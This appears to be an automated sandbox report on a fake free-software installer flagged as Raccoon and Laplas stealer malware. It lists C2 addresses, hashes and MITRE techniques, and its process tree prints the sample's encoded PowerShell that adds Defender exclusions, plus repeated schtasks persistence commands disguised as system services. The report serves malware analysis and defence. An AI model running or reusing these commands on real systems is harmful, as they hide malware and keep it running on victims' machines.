laplas | 8279812ab08bff33c9cc0286bdd17a440964f98aedce3d5c184527e9d1a97fdc

Analysis

max time kernel
51s
max time network
169s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20-04-2023 12:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free-2O23_S0Ft__Se-tup.exe
Size

730.3MB
MD5

85a38f0f83dcd71f4024fa8f4bf9410a
SHA1

263d357e11319518fa9279005430fadf10ae3eb0
SHA256

8279812ab08bff33c9cc0286bdd17a440964f98aedce3d5c184527e9d1a97fdc
SHA512

3eea7c9bb2bb2af9d5a4e05f7e30e92f7172cd1787685a1d62515f0be9de674174dc543bb16e7da80e1fb09bb2d2e18463f0f61fb5a9c7f99276da698dd87ee8
SSDEEP

196608:tEZSGTKbYGgxc13v4BNIP1vYyXYox8YPZFxhiN779hiDmwg/EVdQ0n/:te9TKbYGgxCv4BN4DXXPC7iDm/cQU/

Score

10^/10

laplas raccoon 467a953db8cf896cec6946f6144f8158 clipper discovery persistence spyware stealer

Malware Config

Extracted

Family

raccoon

Botnet

467a953db8cf896cec6946f6144f8158

http://79.137.206.158/

http://79.137.248.245/

xor.plain

Extracted

Family

laplas

http://185.174.137.94

Attributes

api_key
b54641cc29f95948635d659de94166b4528e39706396a99bb9c54497b2ee3421

Signatures

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	Free-2O23_S0Ft__Se-tup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	smygFrE2.exe

Executes dropped EXE 4 IoCs

pid	Process
1452	1IchceUs.exe
648	6O9zz3hP.exe
1876	smygFrE2.exe
3556	dllhost.exe

Loads dropped DLL 3 IoCs

pid	Process
4996	Free-2O23_S0Ft__Se-tup.exe
4996	Free-2O23_S0Ft__Se-tup.exe
4996	Free-2O23_S0Ft__Se-tup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe"	smygFrE2.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1876	smygFrE2.exe
1876	smygFrE2.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1452 set thread context of 4496	1452	1IchceUs.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4028	schtasks.exe
1412	schtasks.exe
4640	schtasks.exe
1104	schtasks.exe
1136	schtasks.exe
1760	schtasks.exe
3188	schtasks.exe
4744	schtasks.exe
4232	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4996	Free-2O23_S0Ft__Se-tup.exe
4996	Free-2O23_S0Ft__Se-tup.exe
4496	AppLaunch.exe
1876	smygFrE2.exe
1876	smygFrE2.exe
1876	smygFrE2.exe
1876	smygFrE2.exe
4604	powershell.exe
4604	powershell.exe
1048	powershell.exe
1048	powershell.exe
1572	powershell.exe
1572	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4496	AppLaunch.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4996 wrote to memory of 1452	4996	Free-2O23_S0Ft__Se-tup.exe	92
PID 4996 wrote to memory of 1452	4996	Free-2O23_S0Ft__Se-tup.exe	92
PID 4996 wrote to memory of 1452	4996	Free-2O23_S0Ft__Se-tup.exe	92
PID 1452 wrote to memory of 4496	1452	1IchceUs.exe	94
PID 1452 wrote to memory of 4496	1452	1IchceUs.exe	94
PID 1452 wrote to memory of 4496	1452	1IchceUs.exe	94
PID 1452 wrote to memory of 4496	1452	1IchceUs.exe	94
PID 1452 wrote to memory of 4496	1452	1IchceUs.exe	94
PID 4996 wrote to memory of 648	4996	Free-2O23_S0Ft__Se-tup.exe	95
PID 4996 wrote to memory of 648	4996	Free-2O23_S0Ft__Se-tup.exe	95
PID 4996 wrote to memory of 648	4996	Free-2O23_S0Ft__Se-tup.exe	95
PID 4996 wrote to memory of 1876	4996	Free-2O23_S0Ft__Se-tup.exe	97
PID 4996 wrote to memory of 1876	4996	Free-2O23_S0Ft__Se-tup.exe	97
PID 4996 wrote to memory of 1876	4996	Free-2O23_S0Ft__Se-tup.exe	97
PID 4496 wrote to memory of 3916	4496	AppLaunch.exe	98
PID 4496 wrote to memory of 3916	4496	AppLaunch.exe	98
PID 4496 wrote to memory of 3916	4496	AppLaunch.exe	98
PID 3916 wrote to memory of 4604	3916	cmd.exe	100
PID 3916 wrote to memory of 4604	3916	cmd.exe	100
PID 3916 wrote to memory of 4604	3916	cmd.exe	100
PID 4496 wrote to memory of 3556	4496	AppLaunch.exe	102
PID 4496 wrote to memory of 3556	4496	AppLaunch.exe	102
PID 4496 wrote to memory of 3556	4496	AppLaunch.exe	102
PID 4496 wrote to memory of 4484	4496	AppLaunch.exe	120
PID 4496 wrote to memory of 4484	4496	AppLaunch.exe	120
PID 4496 wrote to memory of 4484	4496	AppLaunch.exe	120
PID 4496 wrote to memory of 4548	4496	AppLaunch.exe	119
PID 4496 wrote to memory of 4548	4496	AppLaunch.exe	119
PID 4496 wrote to memory of 4548	4496	AppLaunch.exe	119
PID 4496 wrote to memory of 948	4496	AppLaunch.exe	103
PID 4496 wrote to memory of 948	4496	AppLaunch.exe	103
PID 4496 wrote to memory of 948	4496	AppLaunch.exe	103
PID 4496 wrote to memory of 732	4496	AppLaunch.exe	118
PID 4496 wrote to memory of 732	4496	AppLaunch.exe	118
PID 4496 wrote to memory of 732	4496	AppLaunch.exe	118
PID 4496 wrote to memory of 1520	4496	AppLaunch.exe	117
PID 4496 wrote to memory of 1520	4496	AppLaunch.exe	117
PID 4496 wrote to memory of 1520	4496	AppLaunch.exe	117
PID 4496 wrote to memory of 936	4496	AppLaunch.exe	116
PID 4496 wrote to memory of 936	4496	AppLaunch.exe	116
PID 4496 wrote to memory of 936	4496	AppLaunch.exe	116
PID 4496 wrote to memory of 4460	4496	AppLaunch.exe	115
PID 4496 wrote to memory of 4460	4496	AppLaunch.exe	115
PID 4496 wrote to memory of 4460	4496	AppLaunch.exe	115
PID 4496 wrote to memory of 2032	4496	AppLaunch.exe	114
PID 4496 wrote to memory of 2032	4496	AppLaunch.exe	114
PID 4496 wrote to memory of 2032	4496	AppLaunch.exe	114
PID 4496 wrote to memory of 4480	4496	AppLaunch.exe	113
PID 4496 wrote to memory of 4480	4496	AppLaunch.exe	113
PID 4496 wrote to memory of 4480	4496	AppLaunch.exe	113
PID 4496 wrote to memory of 872	4496	AppLaunch.exe	112
PID 4496 wrote to memory of 872	4496	AppLaunch.exe	112
PID 4496 wrote to memory of 872	4496	AppLaunch.exe	112
PID 4496 wrote to memory of 3432	4496	AppLaunch.exe	111
PID 4496 wrote to memory of 3432	4496	AppLaunch.exe	111
PID 4496 wrote to memory of 3432	4496	AppLaunch.exe	111
PID 4496 wrote to memory of 560	4496	AppLaunch.exe	110
PID 4496 wrote to memory of 560	4496	AppLaunch.exe	110
PID 4496 wrote to memory of 560	4496	AppLaunch.exe	110
PID 4496 wrote to memory of 920	4496	AppLaunch.exe	109
PID 4496 wrote to memory of 920	4496	AppLaunch.exe	109
PID 4496 wrote to memory of 920	4496	AppLaunch.exe	109
PID 4496 wrote to memory of 5080	4496	AppLaunch.exe	105
PID 4496 wrote to memory of 5080	4496	AppLaunch.exe	105

C:\Users\Admin\AppData\Local\Temp\Free-2O23_S0Ft__Se-tup.exe
"C:\Users\Admin\AppData\Local\Temp\Free-2O23_S0Ft__Se-tup.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4996
- C:\Users\Admin\AppData\Roaming\1IchceUs.exe
  "C:\Users\Admin\AppData\Roaming\1IchceUs.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    - Drops file in Drivers directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAHoAZwBYAEsAWgBlAFEAeQBYADAASABhAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZABYAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATgBrAFoATwBzAEsAdQBpAG0ATABGADMAMQBOAHkAIwA+AA=="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAHoAZwBYAEsAWgBlAFEAeQBYADAASABhAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZABYAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATgBrAFoATwBzAEsAdQBpAG0ATABGADMAMQBOAHkAIwA+AA=="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4604
  - - C:\ProgramData\Dllhost\dllhost.exe
      "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      Executes dropped EXE
      PID:3556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:4560
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        
        PID:988
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo У & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ОaСщОJneЮЗЙхUH
      4⤵
      PID:948
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:1136
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo жоВвлPАB0ыН5 & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo тAоюz
      4⤵
      PID:5080
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        
        PID:1660
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        
        PID:4192
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        
        PID:2696
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:4120
    - - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /hibernate off
        5⤵
        
        PID:1132
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:4640
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjACoEIwR1ADUAKwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEcANQRtAEoAPAQwBEcEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADsETQRBBFYAGAQ5BB4EIwA+ACAAQAAoACAAPAAjADMEGQQSBGkALQQRBCkEIAQ+BBwEMABCBDgEOgRBACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA8BCUEMwBhACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwArBE0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWAAUBCMAPgA="
      4⤵
      PID:920
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjACoEIwR1ADUAKwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEcANQRtAEoAPAQwBEcEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADsETQRBBFYAGAQ5BB4EIwA+ACAAQAAoACAAPAAjADMEGQQSBGkALQQRBCkEIAQ+BBwEMABCBDgEOgRBACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA8BCUEMwBhACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwArBE0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWAAUBCMAPgA="
        5⤵
        
        PID:1708
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjADYEIgQzABYEGARhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAOQBHBE8AdQBDAHYAPwQvBC0EZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAJwR2AHkAMgBxAE8EIwA+ACAAQAAoACAAPAAjAEMEcwBCAEMAdABCACAENQRJBCcESARKACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA/BEkEQQBBBD0EdQBxACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA7BGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMARQBRAFAARQA3BHIAIwA+AA=="
      4⤵
      PID:560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjADYEIgQzABYEGARhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAOQBHBE8AdQBDAHYAPwQvBC0EZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAJwR2AHkAMgBxAE8EIwA+ACAAQAAoACAAPAAjAEMEcwBCAEMAdABCACAENQRJBCcESARKACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA/BEkEQQBBBD0EdQBxACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA7BGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMARQBRAFAARQA3BHIAIwA+AA=="
        5⤵
        
        PID:2160
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAGoANQA0BDoEQgQeBC8ETwQpBEIEMwRHBDgEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAEoEWgAbBEwAKwRmAB4ERAB3AEMAOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQwA1ACMAPgAgAEAAKAAgADwAIwBRABsERgQiBFcANAQwBCIEEQRRACQEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFkAMwQSBGkARwAeBEsEOgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASwBKBEkEKAR4AEMAOABMAEQAFwQ8BEMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVwA7BHcAMQQjAD4A"
      4⤵
      PID:3432
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGoANQA0BDoEQgQeBC8ETwQpBEIEMwRHBDgEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAEoEWgAbBEwAKwRmAB4ERAB3AEMAOQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQwA1ACMAPgAgAEAAKAAgADwAIwBRABsERgQiBFcANAQwBCIEEQRRACQEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAFkAMwQSBGkARwAeBEsEOgQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASwBKBEkEKAR4AEMAOABMAEQAFwQ8BEMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVwA7BHcAMQQjAD4A"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1048
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjABMEEARWABMEQwRCBFIAOQAdBFMAGARlABMEWgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMARAA5BHYANwRrAEYASgRGAE8ASwQ6BHcAMgASBBsEIwA+ACAAQAAoACAAPAAjADUEQAR2AG0AOQRKBCIENABPBHMAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABoENQQVBBQEKQQ1AG8ASQA5BCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBDABUEcABBAEgAWQAZBBgEMAQWBG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQAgBFoAIwA+AA=="
      4⤵
      PID:872
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjABMEEARWABMEQwRCBFIAOQAdBFMAGARlABMEWgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMARAA5BHYANwRrAEYASgRGAE8ASwQ6BHcAMgASBBsEIwA+ACAAQAAoACAAPAAjADUEQAR2AG0AOQRKBCIENABPBHMAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABoENQQVBBQEKQQ1AG8ASQA5BCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBDABUEcABBAEgAWQAZBBgEMAQWBG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQAgBFoAIwA+AA=="
        5⤵
        
        PID:2960
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAEQEFgRGBFcAQgRiAGYAEwQsBCoENAB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBEAB4EKgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAKgRRAC0ESABMBDMESQRqACEEPQQjAD4AIABAACgAIAA8ACMAbgBmAEoEFQRYADcEQwRIBFMAKQQ5AFUAHgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATwBGBDMEGwRhAEwATgAnBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA5BD0EKARPAHgAHAQlBD4EIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwQRBCMAPgA="
      4⤵
      PID:4480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAEQEFgRGBFcAQgRiAGYAEwQsBCoENAB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBEAB4EKgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAKgRRAC0ESABMBDMESQRqACEEPQQjAD4AIABAACgAIAA8ACMAbgBmAEoEFQRYADcEQwRIBFMAKQQ5AFUAHgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATwBGBDMEGwRhAEwATgAnBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA5BD0EKARPAHgAHAQlBD4EIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwQRBCMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1572
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo н & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЕjQА
      4⤵
      PID:2032
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:4744
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo UШNEжСхrRЙвтРйFveic & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo oЭлpu1hбнц0ч4tСсl
      4⤵
      PID:4460
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:3188
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo NШЮоРg & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЩА
      4⤵
      PID:936
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:4232
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo шецNnOйY & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo yuSAяа
      4⤵
      PID:1520
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:1104
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo EPы & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 57DgU
      4⤵
      PID:732
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:1760
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo RГЩX50VЮ & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo IТ
      4⤵
      PID:4548
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:1412
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C echo yы5VoOЙ0RRгmvuЛЩd & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЦПИДй1WLзvgkuLУхО
      4⤵
      PID:4484
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
        5⤵
        Creates scheduled task(s)
        
        PID:4028
- C:\Users\Admin\AppData\Roaming\6O9zz3hP.exe
  "C:\Users\Admin\AppData\Roaming\6O9zz3hP.exe"
  2⤵
  - Executes dropped EXE
  PID:648
- C:\Users\Admin\AppData\Roaming\smygFrE2.exe
  "C:\Users\Admin\AppData\Roaming\smygFrE2.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1876
- - C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
    "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
    3⤵
    PID:3948

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
761fee773ec1e1eb396eddddeb321865

SHA1
f969e9da9e90a5aef00730b8e1c3763ba2ac46c5

SHA256
82273f8e42cee630011c8e931351186391c4ca9e126e5921db275564e1ef7fbb

SHA512
